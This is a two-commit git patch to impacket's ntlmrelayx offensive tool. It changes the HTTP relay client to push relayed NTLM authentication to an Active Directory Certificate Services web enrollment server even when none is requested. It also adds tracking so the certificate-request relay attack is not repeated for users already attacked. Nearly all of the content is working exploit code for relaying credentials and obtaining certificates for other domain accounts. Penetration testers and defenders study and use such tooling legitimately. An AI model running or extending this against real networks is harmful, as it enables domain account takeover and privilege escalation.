From 2b7493809fc4ab235080e6d72b21259080e6ed4b Mon Sep 17 00:00:00 2001
From: tw1sm <mcreel31@gmail.com>
Date: Wed, 4 Aug 2021 00:20:08 -0400
Subject: [PATCH 1/2] Send auth even if not requested by cert server

---
 impacket/examples/ntlmrelayx/clients/httprelayclient.py | 5 ++++-
 1 file changed, 4 insertions(+), 1 deletion(-)

diff --git a/impacket/examples/ntlmrelayx/clients/httprelayclient.py b/impacket/examples/ntlmrelayx/clients/httprelayclient.py
index 608dc8db4c..ece4d890fa 100644
--- a/impacket/examples/ntlmrelayx/clients/httprelayclient.py
+++ b/impacket/examples/ntlmrelayx/clients/httprelayclient.py
@@ -63,7 +63,10 @@ def sendNegotiate(self,negotiateMessage):
                 return False
         except (KeyError, TypeError):
             LOG.error('No authentication requested by the server for url %s' % self.targetHost)
-            return False
+            if self.serverConfig.isADCSAttack:
+                LOG.info('IIS cert server may allow anonymous authentication, sending NTLM auth anyways')
+            else:
+                return False
 
         #Negotiate auth
         negotiate = base64.b64encode(negotiateMessage).decode("ascii")

From ed9fd5aade3b3d1e60c009cd9765cf15d019ea66 Mon Sep 17 00:00:00 2001
From: Tw1sm <mcreel31@gmail.com>
Date: Wed, 4 Aug 2021 10:08:55 -0400
Subject: [PATCH 2/2] prevent replay of already attacked clients

---
 impacket/examples/ntlmrelayx/attacks/httpattack.py | 7 +++++++
 1 file changed, 7 insertions(+)

diff --git a/impacket/examples/ntlmrelayx/attacks/httpattack.py b/impacket/examples/ntlmrelayx/attacks/httpattack.py
index 454b0a6467..f095fe5ae8 100644
--- a/impacket/examples/ntlmrelayx/attacks/httpattack.py
+++ b/impacket/examples/ntlmrelayx/attacks/httpattack.py
@@ -21,6 +21,9 @@
 from impacket.examples.ntlmrelayx.attacks import ProtocolAttack
 
 PROTOCOL_ATTACK_CLASS = "HTTPAttack"
+# cache already attacked clients
+ELEVATED = []
+
 
 class HTTPAttack(ProtocolAttack):
     """
@@ -62,6 +65,9 @@ def adcs_relay_attack(self):
         key = crypto.PKey()
         key.generate_key(crypto.TYPE_RSA, 4096)
 
+        if self.username in ELEVATED:
+            print('[*] Skipping user %s since attack was already performed' % self.username)
+            return
         csr = self.generate_csr(key, self.username)
         csr = csr.decode().replace("\n", "").replace("+", "%2b").replace(" ", "+")
         print("[*] CSR generated!")
@@ -77,6 +83,7 @@ def adcs_relay_attack(self):
         print("[*] Getting certificate...")
 
         self.client.request("POST", "/certsrv/certfnsh.asp", body=data, headers=headers)
+        ELEVATED.append(self.username)
         response = self.client.getresponse()
 
         if response.status != 200: